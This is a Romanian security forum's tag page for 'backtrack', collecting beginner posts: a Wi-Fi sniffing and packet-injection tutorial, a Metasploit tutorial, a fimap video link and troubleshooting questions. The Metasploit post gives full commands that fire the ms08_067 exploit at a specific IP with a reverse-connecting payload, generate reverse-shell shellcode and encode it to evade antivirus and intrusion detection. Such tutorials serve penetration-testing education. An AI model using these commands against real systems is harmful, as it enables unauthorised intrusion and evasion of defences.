Search the Community
Showing results for tags 'backtrack'.
-
Ma gandeam la un moment dat sa-mi fac propriul meu distro sau un BackTrack cu meniul complet, dar m-am lasat pagubas. Am salvat meniul respectiv pe email si l-am trimis si unora care aveau o tentativa de distro dar au renuntat. Adevarul e ca e multa munca pentru asa ceva. Ma jucam cu Backtrack si am observat ca unele programele si/sau scripturi desi existau in versiunile mai noi, nu mai apareau in meniu, probabil pentru a nu fi prea stufos. Mai erau si unele programe si/sau scripturi care nu apareau in meniu in nici o versiune dar puteau fi accesate in linia de comanda. Am luat toate chestiile astea si le-am pus la un loc si am facut un meniu complet, eu personal, in care sa vezi absolut toate alea. Nu mai stiu daca se opreste la BackTrack 4 sau la BackTrack 5, verificati voi chestia asta, cei care sunt interesati. Nu ma mai intereseaza subiectul de BackTrack, Kali si alte chestii de genul dar am dat peste acest meniu in email azi cand setam niste filtre anti-spam si am zis sa-l dau aici ca poate este cineva interesat, poate vrea sa fac vreun distro personal sau sa se joace cu el. Cu un file compare puteti sa mai adaugati chestiile noi care au aparut si sa faceti o versiune imbunatatita. Spor ! meu.tar
-
Treaba sta asa, vreau sa rulez BT5 in mod live, dupa startx boom un frumos Black screen iar monitorul mort...no signal. kali merge perfect ...am luat "toate" metodele de pe google la rand dar nimic bun. ce e de facut?
-
Packet Sniffing si Injecting Frame-urile WLAN: Administrarea frame-urilor: Administrarea frame-urilor este responsabila cu mentinerea comunicarii intre punctele de acces si clientii wireless. Controlul frame-urilor: Controlul frame-urilor este responsabil cu mentinerea unui schimb adecvat de date intre punctul de acces si clientii wireless. Data frame: Transporta datele actuale trimise in reteaua wireless. Acolo nu exista sub-tipuri pentru data frame. Packet Sniffing folosind Wireshark Deschide wireshark din meniu, sau scrie "wireshark" in consola. In meniu il puteti gasi in Application>BackTrack>Information Gathering>Network Analysis>Network Traffic Analysis>wireshark Odata ce s-a deschis WireShark apasa pe "Interface List". O alta fereastra se va deschide cu o lista de interfete ce pot captura packete. Nota: Eu am setat pe mon0. Click pe start, si WireShark va incepe sa captureze packete. Acelea sunt packetele wireless pe care placa wireless le sniff-eaza(n`am gasit alt cuvant). Acum haideti sa scanam packetele de la propriul nostru punct de acces. Pentru a face asta, vom folosi airodump-ng. Airodump-ng este folosit sa captureze packetele wireless ce folosesc WEP encryption in idea ca vei folosi aircrack-ng.(il voi folosi intr-un tutorial cu alta ocazie). Dar, de data asta, haideti sa dezactivam encryption-ul acces point-ului nostru. Acum intra in terminal si scrie: airodump-ng --bssid 00:D9:98:6A:85:b0 mon0[code][i]Nota:[/i] 00:D9:98:6A:85:b0 este adresa MAC a acces point-ului [b]meu[/b]. Pentru a`l gasi pe al tau, in terminal,[code]ifconfig -aDupa ce airodump-ng termina, vei vedea acces point-ul tau cu canalul pe care ruleaza. Acum trebuie sa blocam pe acces point-ul nostru setand placa wireless pe canalul punctului de acces. Pentru asta, root@bt:~# iwconfig mon0 channel 6Unde "6" este canalul acces point-ului). Acum sa revenim la wireshark. Scrie in filter box, wlan.bssid == ADRESA TA MAC) && (wlan.fc.type_subtype == 0×20 Acum vom "sniff-a" numai packetele de la acces point-ul nostru. Packet Injecting Prima data, vrem sa vedem doar packetele non-beacon in wireshark. Dechi deschide wireshark si scrie in filter box: bssid == ADRESA TA MAC) && !(wlan.fc.type_subtype == 0×08).Apoi deschide terminalul si scrie aireplay-ng -9 -e "Wubi" -a ADRESA TA MAC mon0Nota: Inlocuieste Wubi cu numele SSID-ului tau. Acum, daca te intorci la wireshark, ar trebui sa vezi cateva packete care au fost injectate. Acelea sunt doar packete la intamplare ce nu au vreun efect real. Referinte Main Page - BackTrack LinuxBacktrack Tutorials
-
Termenii Metasploit MSFconsole MSFcli Armitage MSFpayload MSFencode Metasploit e un tool valoros in pen testing, ce poate deveni destul de confuz pentru un incepator. Tutorialul asta despre metasploit te va ajuta sa rulezi metasploit. Probabil ca multe dintre tintele tale vor fi sisteme ce ruleaza pe Windows. Daca esti interesat, recomand sa citesti, Amazon.com: Metasploit: The Penetration Tester's Guide (9781593272883): David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni: Books O carte ce iti va arata cele mai multe dintre framework-urile metasploit, ce te lasa sa descoperi singur adevarata "putere" a metasploit. In orice caz, chiar o recomand. 1. Termenii Metasploit Exploit - sa profiti de o bresa de securitate, in cadrul unui sistem, retea sau aplicatie. Payload - este codul pe care computerul victimei il va executa in framework-ul metasploit. Module - o mica parte de cod ce poate fi adaugata la framework-ul metasploit pentru a executa un atac. Shellcode - o mica parte de cod folosita ca payload. 2. MSFConsole Msfconsole este o interfata cu majoritatea caracteristicilor din metasploit. Msfconsle poate fi folosita pentru a porni atacuri, crearea de "listen-eri", si multe, multe altele. Vom folosi Msfconsole pe parcursul acestui tutorial. Metasploit vine instalat implicit pe backtrack 5. Pentru a accesa msfconsole, deschde terminalul si scrie: root@bt:~# cd /opt/metasploit/msf3 root@bt:/opt/metasploit/msf3# msfconsole Daca ai nevoie de ajutor, pentru a vedea fisierele "help", pur si simplu scrie help urmat de comanda despre care vrei sa afli mai multe. In cazul nostru, vrem sa aflam mai multe despre comanda connect. Aceasta ne permite sa comunicam cu un host. msf > help connect 3. MSFcli MSFcli este o alta cale de a accesa framework-ul metasploit dar se concentreaza mai mult pe scripting si interpretabilitate. Pentru a vedea mai multe despre msfcli: root@bt:~# cd /opt/metasploit/msf3 root@bt:/opt/metasploit/msf3# msfcli -h Acum sa-i facem un mic "test drive" la msfcli. Poti vedea optiunile intr-un modul adaugand litera O la sfarsit de linie. Spre exemplu: root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapt o Acest modul are nevoie de 3 optiuni: RHOST, RPORT, si SMPIPE. Adaugand P la sfarsit ne permite sa vedem ce payloads putem folosi. root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 P Putem rula exploit-ul nostru selectand un payload, inserand optiunile, si rulandu`l punand litera E la sfarsit ca msfcli argument string. root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 PAYLOAD=windows/vncinject/reverse_tcp_dns E Nota: IP-ul selectat ca RHOST este un VPS ce ruleaza pe Windows Server. Acesta va reactiona ca sistemul victimei, pentru teste. Vei fi nevoit sa faci la fel, cu un alt computer sau masina virtuala. Pentru "antrenament", nu actualiza sistemul victimei, sau nu insta un antivirus. 4. Armitage 1. Ruleaza comanda armitage 2. Selecteaza Start MSF. Are GUI. 5. MSFpayload Componenta msfpayload a metasploit ce genereaza shellcode, si executa. Shellcode poate fi generat in mai multe feluri cum ar fi C, Ruby, JavaScript si chiar Visual Basic. Fiecare dintre acestea poate fi folositor in diverse situatii. Pentru ajutor in msfpayload poti scrie: root@bt~# msfpayload -h Precum msfcli, daca ai nevoie sa gasesti optiunile necesare, pune la sfarsitul liniei litera O. root@bt:~# msfpayload windows/shell_reverse_tcp O 6. MSFencode Shellcode-ul generat de msfpayload este functional, dar contine o gramada de caractere null care atunci cand sunt interpretate de majoritatea dintre programe, semnifica sfarsitul unui string, si asta va provoca codul pentru a termina inainte de compilare. In plus, shellcode-ul traverseaza o retea in cleartext ce paote fi preluat de sistemele de detectare a intruziunilor(IDSs) si programele antivirus. Pentru aceasta problema, dezvoltatorii Metasploit ofera msfencode, ce te ajuta sa eviti caracacterele defectuase si sa evite antivirusul si IDS-ul codificand payload-ul initial intr-un mod in care nu contine " "bad" characters ". Scrie, msfencode -h pentru o lista cu optiunile msfencode. Metasploit contine un numar de diferite encodari pentru situatii diferite. Unele vor fi folositoare can poti folosi numai caractere alfanumerice ca parte din payload, cum este in cazul formatului multor fisier sau alte aplicatii ce accepta numai caractere printabile ca input. Un foarte popular si bine cunoscut encoder este: x86/shikata_ga_nai. Pentru o lista cu encoderele disponibile, scrie, root@bt:~# msfencode -l Referinte Main Page - BackTrack Linux BackTrack Tutorials
-
http://www.youtube.com/watch?v=3mch44il4QE Description: Fimap is a python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable. from: securitytube.net
-
Salut! Am 3 masini virtuale, dintre care 2 ruleaza Windows XP (pe una o voi numi server, iar pe cealalta client) si una Backtrack 5 R1. Toate 3 au Internal Network pe adaptorul 2. Problema mea este urmatoarea: daca dau ping serverului din client, merge, dar daca dau din Backtrack, nu mai merge. Ce as putea sa fac? Atasez cate un printscreen cu fiecare, poate ajuta la ceva Server Client Backtrack
- 6 replies
-
- backtrack
- internal network
-
(and 1 more)
Tagged with: